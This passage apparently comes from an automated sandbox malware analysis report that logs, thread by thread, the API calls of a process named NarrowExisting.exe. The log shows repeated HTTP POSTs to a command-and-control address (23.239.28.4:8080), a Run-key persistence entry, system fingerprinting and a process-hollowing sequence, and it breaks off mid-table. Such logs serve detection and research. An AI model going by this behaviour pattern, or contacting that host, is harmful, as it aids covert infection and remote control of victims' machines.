| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 700548, size_out = 700548 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 201865 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 202863 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 204158 |
|
3 | |
| System | Get Time | type = Ticks, time = 205047 |
|
3 | |
| System | Get Time | type = Ticks, time = 206046 |
|
3 | |
| System | Get Time | type = Ticks, time = 207044 |
|
3 | |
| System | Get Time | type = Ticks, time = 208042 |
|
3 | |
| System | Get Time | type = Ticks, time = 209041 |
|
3 |
Thread 0xb18
23
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 198870 |
|
1 | |
| System | Get Time | type = Ticks, time = 199868 |
|
1 | |
| System | Get Time | type = Ticks, time = 200991 |
|
1 | |
| System | Get Time | type = Ticks, time = 201100 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Load | module_name = mpr.dll, base_address = 0x74250000 |
|
1 | |
| Module | Load | module_name = netapi32.dll, base_address = 0x74650000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x747d0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x747b0000 |
|
1 | |
| System | Get Time | type = Ticks, time = 201147 |
|
1 | |
| System | Get Time | type = Ticks, time = 201350 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| System | Get Time | type = Ticks, time = 215047 |
|
3 | |
| File | Create | filename = C:\ProgramData\1150.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| System | Get Time | type = Ticks, time = 215140 |
|
1 | |
| System | Get Time | type = Ticks, time = 216045 |
|
2 | |
| System | Get Time | type = Ticks, time = 217044 |
|
2 |
Thread 0x7a8
10
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x74ee0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75430000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x747d0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x747b0000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\114E.tmp, path = C:\ProgramData |
|
1 | |
| File | Delete | filename = C:\ProgramData\114E.tmp |
|
1 | |
| System | Get Time | type = Ticks, time = 201038 |
|
1 |
Thread 0x3b8
10
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x74ee0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75430000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x747d0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x747b0000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\114F.tmp, path = C:\ProgramData |
|
1 | |
| File | Delete | filename = C:\ProgramData\114F.tmp |
|
1 | |
| System | Get Time | type = Ticks, time = 201038 |
|
1 |
Thread 0x550
11
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x74ee0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75430000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x747d0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x747b0000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\1150.tmp, path = C:\ProgramData |
|
1 | |
| File | Delete | filename = C:\ProgramData\1150.tmp |
|
1 | |
| System | Get Time | type = Ticks, time = 201038 |
|
1 | |
| File | Delete | filename = C:\ProgramData\1150.tmp |
|
1 |
Thread 0x664
44
77
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 203082 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp", os_pid = 0x2ac, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Module | Unmap | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" |
|
1 | |
| Memory | Allocate | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Thread | Get Context | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x664 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp", address = 0x400000, size = 372736 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp", address = 0x7efde008, size = 4 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp", address = 0x7efdf010, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x664 |
|
1 | |
| Thread | Resume | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x664 |
|
1 | |
| System | Get Time | type = Ticks, time = 210726 |
|
1 | |
| System | Get Time | type = Ticks, time = 210866 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 211864 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 212863 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 213877 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 214891 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 215874 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 216872 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
